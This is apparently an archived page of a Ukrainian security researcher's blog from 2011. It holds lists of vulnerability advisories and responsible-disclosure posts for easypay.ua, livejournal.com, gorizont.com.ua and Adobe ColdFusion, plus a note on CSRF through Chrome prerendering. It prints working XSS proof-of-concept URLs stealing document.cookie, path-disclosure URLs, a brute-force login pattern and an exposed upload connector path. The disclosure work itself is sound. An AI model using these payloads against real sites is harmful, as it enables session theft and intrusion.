Архів для категорії 'Уразливості'

Добірка уразливостей

17:06 28.09.2011

В даній добірці уразливості в веб додатках:

  • HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Execution of Arbitrary Code, Denial of Service (деталі)
  • PHPShop 0.8.1 <= | Cross Site Scripting Vulnerability (деталі)
  • Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability (деталі)
  • Alcatel-Lucent OmniVista 4760 NMS ‘lang’ Directory Traversal Vulnerability (деталі)
  • SnapProof (cart.php) Cross Site Scripting (деталі)
  • Alcatel-Lucent OmniPCX Enterprise CS CGI Cookie Buffer Overflow Vulnerability (деталі)
  • pywebdav security update (деталі)
  • dtc security update (деталі)
  • AT-TFTP Server Remote Denial of Service Vulnerability (деталі)
  • PhotoPost PHP 4.8c (showgallery.php) Cross Site Scripting (деталі)

Уразливості на easypay.ua

23:58 27.09.2011

14.12.2010

У серпні, 22.08.2010, я знайшов Brute Force, Abuse of Functionality та Insufficient Anti-automation уразливості на сайті https://easypay.ua. Це сайт системи процесінга пластикових карток (PCI DSS сертифікований і при цьому дірявий). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах онлайнових платіжних систем останній раз я писав про уразливості в Приват24 (версія для Facebook) та уразливість в LiqPAY.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.09.2011

Brute Force:

https://easypay.ua в формі логіна або через GET запит (https://easypay.ua/Default.aspx?action=login&login=1&password=1).

Зараз можливі лише POST запити до форми логіна.

Abuse of Functionality:

По відповідям в формі логіна можна визначати логіни користувачів.

Зараз змінили адресу форми логіна на https://easypay.ua/auth/signin, але уразливість залишилася.

Insufficient Anti-automation:

На головній сторінці в формі “Быстрое пополнение” або через POST чи GET запит до неї. В даній формі не було капчі. Зараз форму прибрали.

В формі “Поддержка” не було і немає капчі.

В формах реєстрації (https://easypay.ua/Registration.aspx) та відновлення паролю (https://easypay.ua/RestorePassword.aspx, зараз її адреса https://easypay.ua/restore) використовалася уразлива капча - в адресі капчі був вказаний її код. Зараз замінили її на рекапчу.

Частина уразливостей вже виправлена, а частина досі не виправлена. На цьому PCI DSS сайті.

Уразливість на www.gorizont.com.ua

23:56 26.09.2011

09.12.2010

У серпні, 19.08.2010, я знайшов Abuse of Functionality уразливість на сайті http://www.gorizont.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

26.09.2011

Abuse of Functionality (Arbitrary File Upload):

http://www.gorizont.com.ua/editor/editor/filemanager/connectors/test.html

Яка може використовуватися для завантаження різних файлів на сайт (розширення яких дозволені, наприклад, pdf), в тому числі й інфікованих pdf-файлів для розповсюдження вірусів через сайт. А також дана уразливість може використовуватися для проведення Cross-Site Scripting атак.

XSS:

Дана уразливість досі не виправлена.

Добірка уразливостей

22:41 26.09.2011

В даній добірці уразливості в веб додатках:

  • CA Total Defense Suite UNC Management Console DeleteReports SQL Injection Vulnerability (деталі)
  • “wsnuser” Cookie SQL Injection vulnerability in WSN Guest (деталі)
  • CA Total Defense Suite UNC Management Console RegenerateReport SQL Injection Vulnerability (деталі)
  • Vanilla Forums 2.0.17.1 ~ 2.0.17.5 <= Cross Site Scripting Vulnerability (деталі)
  • Security Notice for CA Total Defense (деталі)
  • prestashop vuln: sql injection (деталі)
  • Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (деталі)
  • Insecure secure cookie in web.go (деталі)
  • HP Performance Insight Running on HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access to Sensitive Information (деталі)
  • Vulnerabilities in Mailman 2.1 (деталі)

Уразливості в плагінах для WordPress №51

23:51 24.09.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Redirection та 1 Flash Gallery і в самому WordPress. Для котрих з’явилися експлоіти. Redirection - це плагін для управління 301 редирекціями і слідкування за 404 помилками, 1 Flash Gallery - це плагін для створення фото галереї. А також SQL Injection уразливість в WP.

Вищезгадана SQL ін’єкція в движку була виправлена в WordPress 3.0.2.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Вбудований CSRF в Google Chrome

19:21 24.09.2011

В березні в записі Вбудований CSRF в Mozilla та Firefox я писав про проведення CSRF атак через префетчінг - функцію попереднього завантаження сторінок. Що наявна в браузерах від Mozilla (всіх браузерах на движку Gecko).

І в Google Chrome 13, як в dev і beta, так і фінальній версії, що вийшла минулого місяця, додали підтримку префетчінгу. Цю функцію Гугл ще називає пререндіренгом та Instant Pages. Тому з недавніх пір не тільки браузери Mozilla та Firefox, але й Chrome вразливі до CSRF атак через префетчінг.

По замовчуванню в Chrome опція префетчінга увімкнена. Що дозволяє проводити дану атаку на всіх користувачів Google Chrome 13 та наступних версій.

На даний момент підтримується один з трьох (реалізованих Мозілою) варіантів префетчінгу (і відповідно варіантів атаки):

<link rel=”prerender” href=”http://site/script_to_attack”>

Тільки замість “prefetch”, використовується “prerender”. Варіанти префетчінгу (і атаки) через meta-тег і HTTP заголовок Link будуть додані пізніше.

Враховуючи, що Гугл розширив концепцію префетчінга в своїй функції пререндерінга, то і атака може бути більш небезпечною. Якщо у префетчінгу відбувався лише один запит до одної сторінки (і лише вона викачувалася), то у пререндеренгу викачується як сама сторінка, так і всі ресурси, на які вона посилається (тобто відбувається багато запитів з одного лише link-тега). Що може використовуватися як з метою DoS-атак одночасно на велике число ресурсів (зі сторінки, на яку вказує link-тег), так і для проведення багатьох CSRF-атак (на один або багато різних сайтів).

Для захисту від даної атаки потрібно відключити префетчінг в браузері. Для цього в налаштуваннях (Settings) потрібно відключити опцію “Predict network actions to improve page load performance”. В цьому відношенні Гугл зробив краще ніж Мозіла, бо залишив дану опцію в налаштуваннях (тому що Мозіла робила так в старих браузерах, а починаючи з Firefox приховала дану опцію і потрібно її змінювати спеціальних просунутим методом, що я описав в вищезгаданому записі).

Атака працює в Google Chrome 13.0. А також (при використанні rel=”prefetch”), як я писав раніше, в Mozilla та Firefox (та інших браузерах на движку Gecko, що має функцію префетчінга).

XSS та FPD уразливості в Adobe ColdFusion

23:51 23.09.2011

25.06.2011

У червні, 18.06.2011, я знайшов Cross-Site Scripting та Full path disclosure уразливості в Adobe ColdFusion. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Adobe ColdFusion.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

23.09.2011

XSS:

http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS через заголовок User-Agent)

http://site/CFIDE/probe.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS через заголовок User-Agent)

Full path disclosure:

http://site/CFIDE/probe.cfm
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm

Через componentdetail.cfm та cfcexplorer.cfc можна отримати FPD навіть при відключених дебаг повідомленнях на сервері.

Уразливі Adobe ColdFusion 7 та попередні версії до XSS, і Adobe ColdFusion 9 та попередні версії до FPD.

Добірка уразливостей

22:48 23.09.2011

В даній добірці уразливості в веб додатках:

  • CA Total Defense Suite UNC Management Console DeleteFilter SQL Injection Vulnerability (деталі)
  • Apache Archiva cross-site scripting vulnerability (деталі)
  • CA Total Defense Suite NonAssignedUserList Stored Procedure SQL Injection Vulnerability (деталі)
  • Path disclosure in FlatnuX (деталі)
  • CA Total Defense Suite UNC Management Console DeleteReportLayout SQL Injection Vulnerability (деталі)
  • DoS (Denial of Service) Risk in FlatnuX (деталі)
  • HP Virtual Server Environment for Windows, Remote Privilege Elevation (деталі)
  • Path disclosure in Coppermine (деталі)
  • Directory Traversal Vulnerability in Viola DVR VIO-4/1000 (деталі)
  • “time” SQL Injection vulnerability in WSN Guest (деталі)

Уразливість на www.livejournal.com

23:58 22.09.2011

08.12.2010

У серпні, 13.08.2010, я знайшов Cross-Site Scripting уразливість на популярному проекті http://www.livejournal.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на livejournal.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.09.2011

XSS:

http://www.livejournal.com/update.bml?event=%3Cimg%20src='1'%20onerror=alert(document.cookie)%3E

XSS працювала в браузерах IE та Chrome.

Дана уразливість вже виправлена.

Добірка уразливостей

22:41 22.09.2011

В даній добірці уразливості в веб додатках:

  • HP Insight Control Performance Management for Windows, Remote Privilege Elevation, Cross Site Request Forgery (CSRF) (деталі)
  • Multiple XSS vulnerabilities in Gollos (деталі)
  • CA Total Defense Suite Heartbeat Web Service Remote Code Execution Vulnerability (деталі)
  • Multiple XSS vulnerabilities in Wikipad (деталі)
  • CA Total Defense Suite UnassignFunctionalUsers Stored Procedure SQL Injection Vulnerability (деталі)
  • SQL Injection in Seo Panel (деталі)
  • CA Total Defense Suite UNCWS Web Service getDBConfigSettings Credential Disclosure Vulnerability (деталі)
  • SQL Injection in Seo Panel (деталі)
  • CA Total Defense Suite UnassignAdminRoles Stored Procedure SQL Injection Vulnerability (деталі)
  • SQL Injection in Seo Panel (деталі)